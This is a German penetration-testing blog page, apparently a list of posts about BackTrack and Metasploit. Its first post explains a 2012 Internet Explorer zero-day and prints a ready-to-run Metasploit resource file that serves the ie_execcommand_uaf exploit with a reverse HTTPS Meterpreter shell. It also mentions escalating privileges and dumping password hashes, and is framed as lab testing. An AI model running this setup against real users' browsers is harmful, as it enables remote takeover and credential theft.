Internet Explorer 0-Day – Metasploit-Modul

Am 17.09.2012 wurde eine kritische Schwachstelle Microsoft Internet Explorer bekannt.  Betroffen sind IT-Systeme, die die Software in den Versionen 6, 7, 8 oder 9 unter den Betriebssystemen Microsoft Windows XP, Microsoft Windows Vista oder Microsoft Windows 7 verwenden. Die Schwachstelle wird bereits in gezielten Angriffen ausgenutzt. Um die Schwachstelle auszunutzen reicht es aus, den Internetnutzer auf eine präparierte Webseite zu locken. Beim Anzeigen dieser Webseite kann dann durch Ausnutzen der Schwachstelle beliebiger Code auf dem betroffenen System mit den Rechten des Nutzers ausgeführt werden.

Um die eigenen Systeme testen zu können, wurde ein Metasploit-Modul herausgebraucht.

Im Folgenden wird die Handhabung in einem Testnetzwerk kurz beschrieben und in einem Video erläutert. Der Angreifer nutzt Backtrack 5 R3 (IP: 192.168.222.16) und das Metasploit-Framework.  Auf dem Zielsystem (IP: 192.168.222.71) ist Windows 7 und der Internet Explorer 8 installiert.

Mittels der folgenden  Resource-Datei (ie0day.rc) wird das entsprechende Module geladen, die Serverparameter eingestellt und der Payload ausgewählt. Nach der Ausführung nimmt das  Angriffssystem „Anfragen“ auf Port 80 entgegen.

use exploit/windows/browser/ie_execcommand_uaf
set SRVHOST 192.168.222.16
set SRVPORT 80
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.222.16
set LPORT 443
set URIPATH /
exploit

									

Sobald das Zielsytem die URL http://192.168.222.16 im Internet Explorer öffnet, wird der Exploit ausgeführt und der entsprechende Payload (in diesem Fall windows/meterpreter/reverse_https) nachgeladen.  Nun können beliebige Meterpreter-Skripte ausgeführt werden. Im  Video werden die Nutzerrechte zu Systemrechten eskaliert und die Passwort-Hashes ausgelesen.

Weiterlesen

Backtrack 5 R3 erschienen

Neben vielen Programmkorrekturen beinhaltet das neue Release über 60 neue Tools. Viele wurden während den Konferenzen Blackhat und Defcon 2012 bereits vorgestellt. Mit „Physical Exploitation“ wurde eine neue Kategorie von Software integriert, die zukünftig auch Hardware-Hacks möglich machen sollen. So sind nun auch die Arduino-Entwicklungsumgebung und eine Auswahl der Kautilya Teensy Payloads integriert. Das Metasploit-Framework  ist in Version 4.4 verfügbar und der Network Analyzer Wireshark erfuhr ein Update auf Version 1.8.0. Die entsprechenden ISO-Images liegen … Weiterlesen

Backtrack 5 R2 erschienen

Das lang erwartete Release R2 von Backtrack 5 ist veröffentlicht.  Es kommt mit brandneuem Kernel 3.2.6 und einer Reihe neuer und aktualisierter Tools. Wer sein System updaten möchte, kann dies über folgende Befehle tun: apt-get update apt-get dist-upgrade apt-get install beef reboot fix-splash reboot Die neuen Tools  können wie folgt  nachinstalliert werden: apt-get install pipal findmyhash metasploit joomscan hashcat-gui golismero easy-creds pyrit sqlsus vega libhijack tlssled hash-identifier wol-e dirb reaver wce sslyze magictree nipper-ng rec-studio … Weiterlesen

Backtrack 5 PostgreSQL Datenbank und Workspaces

Die Einträge innerhalb der Datenbank werden über sogenannte „Workspaces“ verwaltet. So kann man jedem Projekt einen bestimmten Bereich in der Datenbank zuordnen. Workspaces können neu erstellt, angezeigt  und gelöscht werden.  Nachfolgend werden die Befehle dazu aufgelistet.

msf > workspace -h
Usage:
    workspace                  List workspaces
    workspace [name]           Switch workspace
    workspace -a [name] ...    Add workspace(s)
    workspace -d [name] ...    Delete workspace(s)
    workspace -h               Show this help information

									

In Backtrack 5 ist die  Datenbank mit Namen msf3 zur Nutzung voreingestellt.

Weiterlesen

Armitage Multi-Player-Modus

Der Security Engineer Raphael Mudge lebt in Washington D.C. und hat neben weiteren Projekten eine GUI  für das Metasploit-Framework entwickelt.  Auf der Homepage bezeichnet er es als „Cyber Attack Management“  Tool für Metasploit.  Nach seiner Aussage hat Mudge  sehr viele Security Professionals getroffen, die nicht wussten wie sie Metasploit für ihre Arbeit nutzen sollten. Das war Antrieb genug eine nichtkommerzielle GUI  zu entwickeln.

Armitage ist in die Backtrack5 Oberfläche integriert. Ein Test lohnt sich.

Als sehr interessantes Feature möchte ich heute die Multi-Player Eigenschaften vorstellen. Diese ermöglichen einem Team,  Datenbanken gemeinsam zu nutzen. Dabei kann jedes Teammitglied alle Host Informationen, Netzwerk-Scans und Sessions  nutzen. Hat z.B. ein Nutzer ein Host penetriert, so werden diese Daten automatisch allen Mitgliedern zur Verfügung gestellt. Es können auch Meterpreter-Sessions gemeinsam genutzt werden. Somit wird eine zeitgleiche Darstellung aller Informationen in den Konsolen der Nutzer möglich.

Weiterlesen

Backtrack5 – eine Revolution

Das Entwicklungsteam hat die Sicherheitsdistribution BackTrack am 10.05.2011 in der Version 5  mit Namen „Revolution“ veröffentlicht.  Als erstes fällt die optisch aufgepeppte Oberfläche ins Auge. Aber auch „unter der Haube“ gibt es einige Neuerungen. Backtrack basiert in der aktuellen Version nun auf Ubuntu Lucid LTS mit Kernel 2.6.83.  Erstmals sind eine 64-bit-Version und eine ARM-Version vorhanden. Außerdem kann man zwischen einem  Gnome oder  KDE-Desktop wählen.  Eine VM-Ware Image (GNOME-32-bit) wird ebenfalls bereitgestellt.  Die Downloads werden … Weiterlesen

Diese Seite verwendet Cookies, um die Nutzerfreundlichkeit zu verbessern. Mit der weiteren Verwendung stimmst du dem zu.

Datenschutzerklärung